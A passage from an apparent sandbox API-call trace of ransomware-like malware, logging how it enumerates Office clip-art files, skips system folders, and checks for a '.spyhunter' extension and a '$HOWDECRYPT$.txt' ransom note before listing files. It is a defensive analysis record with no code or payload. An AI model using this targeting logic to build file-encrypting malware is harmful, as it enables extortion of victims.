(lpString1="J0075478.GIF", lpString2="Windows") returned -1 [0097.915] lstrlenW (lpString="Windows") returned 7 [0097.915] lstrcmpiW (lpString1="J0075478.GIF", lpString2="$Recycle.bin") returned 1 [0097.915] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.915] lstrcmpiW (lpString1="J0075478.GIF", lpString2="System Volume Information") returned -1 [0097.915] lstrlenW (lpString="System Volume Information") returned 25 [0097.915] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 67 [0097.915] StrStrIW (lpFirst="J0075478.GIF", lpSrch=".spyhunter") returned 0x0 [0097.915] lstrcmpW (lpString1="J0075478.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.915] lstrcmpW (lpString1="J0075478.GIF", lpString2="_uninstalling_.png") returned 1 [0097.916] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 67 [0097.916] GetProcessHeap () returned 0x2c0000 [0097.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3898b8 [0097.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2050) returned 0x2c16890 [0097.916] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.916] lstrcmpiW (lpString1="J0086384.WMF", lpString2="Windows") returned -1 [0097.916] lstrlenW (lpString="Windows") returned 7 [0097.916] lstrcmpiW (lpString1="J0086384.WMF", lpString2="$Recycle.bin") returned 1 [0097.916] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.916] lstrcmpiW (lpString1="J0086384.WMF", lpString2="System Volume Information") returned -1 [0097.916] lstrlenW (lpString="System Volume Information") returned 25 [0097.916] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 67 [0097.916] StrStrIW (lpFirst="J0086384.WMF", lpSrch=".spyhunter") returned 0x0 [0097.916] lstrcmpW (lpString1="J0086384.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.916] lstrcmpW (lpString1="J0086384.WMF", lpString2="_uninstalling_.png") returned 1 [0097.916] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned 67 [0097.916] GetProcessHeap () returned 0x2c0000 [0097.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389988 [0097.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2058) returned 0x2c16890 [0097.916] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.916] lstrcmpiW (lpString1="J0086420.WMF", lpString2="Windows") returned -1 [0097.916] lstrlenW (lpString="Windows") returned 7 [0097.917] lstrcmpiW (lpString1="J0086420.WMF", lpString2="$Recycle.bin") returned 1 [0097.917] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.917] lstrcmpiW (lpString1="J0086420.WMF", lpString2="System Volume Information") returned -1 [0097.917] lstrlenW (lpString="System Volume Information") returned 25 [0097.917] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 67 [0097.917] StrStrIW (lpFirst="J0086420.WMF", lpSrch=".spyhunter") returned 0x0 [0097.917] lstrcmpW (lpString1="J0086420.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.917] lstrcmpW (lpString1="J0086420.WMF", lpString2="_uninstalling_.png") returned 1 [0097.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned 67 [0097.917] GetProcessHeap () returned 0x2c0000 [0097.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389a58 [0097.917] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2060) returned 0x2c16890 [0097.917] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.917] lstrcmpiW (lpString1="J0086424.WMF", lpString2="Windows") returned -1 [0097.917] lstrlenW (lpString="Windows") returned 7 [0097.917] lstrcmpiW (lpString1="J0086424.WMF", lpString2="$Recycle.bin") returned 1 [0097.917] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.917] lstrcmpiW (lpString1="J0086424.WMF", lpString2="System Volume Information") returned -1 [0097.917] lstrlenW (lpString="System Volume Information") returned 25 [0097.917] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 67 [0097.917] StrStrIW (lpFirst="J0086424.WMF", lpSrch=".spyhunter") returned 0x0 [0097.917] lstrcmpW (lpString1="J0086424.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.918] lstrcmpW (lpString1="J0086424.WMF", lpString2="_uninstalling_.png") returned 1 [0097.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 67 [0097.918] GetProcessHeap () returned 0x2c0000 [0097.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389b28 [0097.918] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2068) returned 0x2c16890 [0097.918] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.918] lstrcmpiW (lpString1="J0086426.WMF", lpString2="Windows") returned -1 [0097.918] lstrlenW (lpString="Windows") returned 7 [0097.918] lstrcmpiW (lpString1="J0086426.WMF", lpString2="$Recycle.bin") returned 1 [0097.918] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.918] lstrcmpiW (lpString1="J0086426.WMF", lpString2="System Volume Information") returned -1 [0097.918] lstrlenW (lpString="System Volume Information") returned 25 [0097.918] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 67 [0097.918] StrStrIW (lpFirst="J0086426.WMF", lpSrch=".spyhunter") returned 0x0 [0097.918] lstrcmpW (lpString1="J0086426.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.918] lstrcmpW (lpString1="J0086426.WMF", lpString2="_uninstalling_.png") returned 1 [0097.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 67 [0097.918] GetProcessHeap () returned 0x2c0000 [0097.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389bf8 [0097.919] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2070) returned 0x2c16890 [0097.919] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.919] lstrcmpiW (lpString1="J0086428.WMF", lpString2="Windows") returned -1 [0097.919] lstrlenW (lpString="Windows") returned 7 [0097.919] lstrcmpiW (lpString1="J0086428.WMF", lpString2="$Recycle.bin") returned 1 [0097.919] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.919] lstrcmpiW (lpString1="J0086428.WMF", lpString2="System Volume Information") returned -1 [0097.919] lstrlenW (lpString="System Volume Information") returned 25 [0097.919] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 67 [0097.919] StrStrIW (lpFirst="J0086428.WMF", lpSrch=".spyhunter") returned 0x0 [0097.919] lstrcmpW (lpString1="J0086428.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.919] lstrcmpW (lpString1="J0086428.WMF", lpString2="_uninstalling_.png") returned 1 [0097.919] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 67 [0097.919] GetProcessHeap () returned 0x2c0000 [0097.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389cc8 [0097.919] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2078) returned 0x2c16890 [0097.919] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.919] lstrcmpiW (lpString1="J0086432.WMF", lpString2="Windows") returned -1 [0097.919] lstrlenW (lpString="Windows") returned 7 [0097.919] lstrcmpiW (lpString1="J0086432.WMF", lpString2="$Recycle.bin") returned 1 [0097.919] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.920] lstrcmpiW (lpString1="J0086432.WMF", lpString2="System Volume Information") returned -1 [0097.920] lstrlenW (lpString="System Volume Information") returned 25 [0097.920] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 67 [0097.920] StrStrIW (lpFirst="J0086432.WMF", lpSrch=".spyhunter") returned 0x0 [0097.922] lstrcmpW (lpString1="J0086432.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.922] lstrcmpW (lpString1="J0086432.WMF", lpString2="_uninstalling_.png") returned 1 [0097.922] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 67 [0097.922] GetProcessHeap () returned 0x2c0000 [0097.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389d98 [0097.922] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2080) returned 0x2c16890 [0097.923] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.923] lstrcmpiW (lpString1="J0086478.WMF", lpString2="Windows") returned -1 [0097.923] lstrlenW (lpString="Windows") returned 7 [0097.923] lstrcmpiW (lpString1="J0086478.WMF", lpString2="$Recycle.bin") returned 1 [0097.923] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.923] lstrcmpiW (lpString1="J0086478.WMF", lpString2="System Volume Information") returned -1 [0097.923] lstrlenW (lpString="System Volume Information") returned 25 [0097.923] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 67 [0097.923] StrStrIW (lpFirst="J0086478.WMF", lpSrch=".spyhunter") returned 0x0 [0097.923] lstrcmpW (lpString1="J0086478.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.923] lstrcmpW (lpString1="J0086478.WMF", lpString2="_uninstalling_.png") returned 1 [0097.923] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 67 [0097.923] GetProcessHeap () returned 0x2c0000 [0097.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389e68 [0097.923] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2088) returned 0x2c16890 [0097.923] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.923] lstrcmpiW (lpString1="J0089945.WMF", lpString2="Windows") returned -1 [0097.923] lstrlenW (lpString="Windows") returned 7 [0097.923] lstrcmpiW (lpString1="J0089945.WMF", lpString2="$Recycle.bin") returned 1 [0097.923] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.923] lstrcmpiW (lpString1="J0089945.WMF", lpString2="System Volume Information") returned -1 [0097.923] lstrlenW (lpString="System Volume Information") returned 25 [0097.923] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 67 [0097.924] StrStrIW (lpFirst="J0089945.WMF", lpSrch=".spyhunter") returned 0x0 [0097.924] lstrcmpW (lpString1="J0089945.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.924] lstrcmpW (lpString1="J0089945.WMF", lpString2="_uninstalling_.png") returned 1 [0097.924] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 67 [0097.924] GetProcessHeap () returned 0x2c0000 [0097.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x389f38 [0097.924] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2090) returned 0x2c16890 [0097.924] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.924] lstrcmpiW (lpString1="J0089992.WMF", lpString2="Windows") returned -1 [0097.924] lstrlenW (lpString="Windows") returned 7 [0097.924] lstrcmpiW (lpString1="J0089992.WMF", lpString2="$Recycle.bin") returned 1 [0097.924] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.924] lstrcmpiW (lpString1="J0089992.WMF", lpString2="System Volume Information") returned -1 [0097.924] lstrlenW (lpString="System Volume Information") returned 25 [0097.924] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 67 [0097.924] StrStrIW (lpFirst="J0089992.WMF", lpSrch=".spyhunter") returned 0x0 [0097.924] lstrcmpW (lpString1="J0089992.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.924] lstrcmpW (lpString1="J0089992.WMF", lpString2="_uninstalling_.png") returned 1 [0097.924] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 67 [0097.924] GetProcessHeap () returned 0x2c0000 [0097.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a008 [0097.925] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2098) returned 0x2c16890 [0097.925] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.925] lstrcmpiW (lpString1="J0090027.WMF", lpString2="Windows") returned -1 [0097.925] lstrlenW (lpString="Windows") returned 7 [0097.925] lstrcmpiW (lpString1="J0090027.WMF", lpString2="$Recycle.bin") returned 1 [0097.925] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.925] lstrcmpiW (lpString1="J0090027.WMF", lpString2="System Volume Information") returned -1 [0097.925] lstrlenW (lpString="System Volume Information") returned 25 [0097.925] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 67 [0097.925] StrStrIW (lpFirst="J0090027.WMF", lpSrch=".spyhunter") returned 0x0 [0097.925] lstrcmpW (lpString1="J0090027.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.925] lstrcmpW (lpString1="J0090027.WMF", lpString2="_uninstalling_.png") returned 1 [0097.925] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 67 [0097.925] GetProcessHeap () returned 0x2c0000 [0097.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a0d8 [0097.925] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20a0) returned 0x2c16890 [0097.925] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.925] lstrcmpiW (lpString1="J0090087.WMF", lpString2="Windows") returned -1 [0097.925] lstrlenW (lpString="Windows") returned 7 [0097.925] lstrcmpiW (lpString1="J0090087.WMF", lpString2="$Recycle.bin") returned 1 [0097.925] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.925] lstrcmpiW (lpString1="J0090087.WMF", lpString2="System Volume Information") returned -1 [0097.926] lstrlenW (lpString="System Volume Information") returned 25 [0097.926] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 67 [0097.926] StrStrIW (lpFirst="J0090087.WMF", lpSrch=".spyhunter") returned 0x0 [0097.926] lstrcmpW (lpString1="J0090087.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.926] lstrcmpW (lpString1="J0090087.WMF", lpString2="_uninstalling_.png") returned 1 [0097.926] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 67 [0097.926] GetProcessHeap () returned 0x2c0000 [0097.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a1a8 [0097.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20a8) returned 0x2c16890 [0097.926] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.926] lstrcmpiW (lpString1="J0090089.WMF", lpString2="Windows") returned -1 [0097.926] lstrlenW (lpString="Windows") returned 7 [0097.926] lstrcmpiW (lpString1="J0090089.WMF", lpString2="$Recycle.bin") returned 1 [0097.926] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.926] lstrcmpiW (lpString1="J0090089.WMF", lpString2="System Volume Information") returned -1 [0097.926] lstrlenW (lpString="System Volume Information") returned 25 [0097.926] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 67 [0097.926] StrStrIW (lpFirst="J0090089.WMF", lpSrch=".spyhunter") returned 0x0 [0097.926] lstrcmpW (lpString1="J0090089.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.926] lstrcmpW (lpString1="J0090089.WMF", lpString2="_uninstalling_.png") returned 1 [0097.926] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 67 [0097.926] GetProcessHeap () returned 0x2c0000 [0097.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a278 [0097.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20b0) returned 0x2c16890 [0097.927] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.927] lstrcmpiW (lpString1="J0090149.WMF", lpString2="Windows") returned -1 [0097.927] lstrlenW (lpString="Windows") returned 7 [0097.927] lstrcmpiW (lpString1="J0090149.WMF", lpString2="$Recycle.bin") returned 1 [0097.927] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.927] lstrcmpiW (lpString1="J0090149.WMF", lpString2="System Volume Information") returned -1 [0097.927] lstrlenW (lpString="System Volume Information") returned 25 [0097.927] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 67 [0097.927] StrStrIW (lpFirst="J0090149.WMF", lpSrch=".spyhunter") returned 0x0 [0097.927] lstrcmpW (lpString1="J0090149.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.927] lstrcmpW (lpString1="J0090149.WMF", lpString2="_uninstalling_.png") returned 1 [0097.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 67 [0097.927] GetProcessHeap () returned 0x2c0000 [0097.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a348 [0097.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20b8) returned 0x2c16890 [0097.927] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.927] lstrcmpiW (lpString1="J0090390.WMF", lpString2="Windows") returned -1 [0097.927] lstrlenW (lpString="Windows") returned 7 [0097.927] lstrcmpiW (lpString1="J0090390.WMF", lpString2="$Recycle.bin") returned 1 [0097.927] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.928] lstrcmpiW (lpString1="J0090390.WMF", lpString2="System Volume Information") returned -1 [0097.928] lstrlenW (lpString="System Volume Information") returned 25 [0097.928] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 67 [0097.928] StrStrIW (lpFirst="J0090390.WMF", lpSrch=".spyhunter") returned 0x0 [0097.928] lstrcmpW (lpString1="J0090390.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.928] lstrcmpW (lpString1="J0090390.WMF", lpString2="_uninstalling_.png") returned 1 [0097.928] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 67 [0097.928] GetProcessHeap () returned 0x2c0000 [0097.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a418 [0097.928] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20c0) returned 0x2c16890 [0097.928] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.928] lstrcmpiW (lpString1="J0090777.WMF", lpString2="Windows") returned -1 [0097.928] lstrlenW (lpString="Windows") returned 7 [0097.928] lstrcmpiW (lpString1="J0090777.WMF", lpString2="$Recycle.bin") returned 1 [0097.928] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.928] lstrcmpiW (lpString1="J0090777.WMF", lpString2="System Volume Information") returned -1 [0097.928] lstrlenW (lpString="System Volume Information") returned 25 [0097.928] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 67 [0097.928] StrStrIW (lpFirst="J0090777.WMF", lpSrch=".spyhunter") returned 0x0 [0097.928] lstrcmpW (lpString1="J0090777.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.928] lstrcmpW (lpString1="J0090777.WMF", lpString2="_uninstalling_.png") returned 1 [0097.928] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 67 [0097.928] GetProcessHeap () returned 0x2c0000 [0097.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a4e8 [0097.929] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20c8) returned 0x2c16890 [0097.929] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.929] lstrcmpiW (lpString1="J0090779.WMF", lpString2="Windows") returned -1 [0097.929] lstrlenW (lpString="Windows") returned 7 [0097.929] lstrcmpiW (lpString1="J0090779.WMF", lpString2="$Recycle.bin") returned 1 [0097.929] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.929] lstrcmpiW (lpString1="J0090779.WMF", lpString2="System Volume Information") returned -1 [0097.929] lstrlenW (lpString="System Volume Information") returned 25 [0097.929] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 67 [0097.929] StrStrIW (lpFirst="J0090779.WMF", lpSrch=".spyhunter") returned 0x0 [0097.929] lstrcmpW (lpString1="J0090779.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.929] lstrcmpW (lpString1="J0090779.WMF", lpString2="_uninstalling_.png") returned 1 [0097.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 67 [0097.929] GetProcessHeap () returned 0x2c0000 [0097.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a5b8 [0097.929] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20d0) returned 0x2c16890 [0097.929] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.929] lstrcmpiW (lpString1="J0090781.WMF", lpString2="Windows") returned -1 [0097.929] lstrlenW (lpString="Windows") returned 7 [0097.929] lstrcmpiW (lpString1="J0090781.WMF", lpString2="$Recycle.bin") returned 1 [0097.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.930] lstrcmpiW (lpString1="J0090781.WMF", lpString2="System Volume Information") returned -1 [0097.930] lstrlenW (lpString="System Volume Information") returned 25 [0097.930] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 67 [0097.930] StrStrIW (lpFirst="J0090781.WMF", lpSrch=".spyhunter") returned 0x0 [0097.930] lstrcmpW (lpString1="J0090781.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.930] lstrcmpW (lpString1="J0090781.WMF", lpString2="_uninstalling_.png") returned 1 [0097.930] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 67 [0097.930] GetProcessHeap () returned 0x2c0000 [0097.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a688 [0097.930] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20d8) returned 0x2c16890 [0097.930] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.930] lstrcmpiW (lpString1="J0090783.WMF", lpString2="Windows") returned -1 [0097.930] lstrlenW (lpString="Windows") returned 7 [0097.930] lstrcmpiW (lpString1="J0090783.WMF", lpString2="$Recycle.bin") returned 1 [0097.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.930] lstrcmpiW (lpString1="J0090783.WMF", lpString2="System Volume Information") returned -1 [0097.930] lstrlenW (lpString="System Volume Information") returned 25 [0097.930] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 67 [0097.930] StrStrIW (lpFirst="J0090783.WMF", lpSrch=".spyhunter") returned 0x0 [0097.930] lstrcmpW (lpString1="J0090783.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.930] lstrcmpW (lpString1="J0090783.WMF", lpString2="_uninstalling_.png") returned 1 [0097.931] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 67 [0097.931] GetProcessHeap () returned 0x2c0000 [0097.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a7a8 [0097.931] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20e0) returned 0x2c16890 [0097.931] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.931] lstrcmpiW (lpString1="J0093905.WMF", lpString2="Windows") returned -1 [0097.931] lstrlenW (lpString="Windows") returned 7 [0097.931] lstrcmpiW (lpString1="J0093905.WMF", lpString2="$Recycle.bin") returned 1 [0097.931] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.931] lstrcmpiW (lpString1="J0093905.WMF", lpString2="System Volume Information") returned -1 [0097.931] lstrlenW (lpString="System Volume Information") returned 25 [0097.931] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 67 [0097.931] StrStrIW 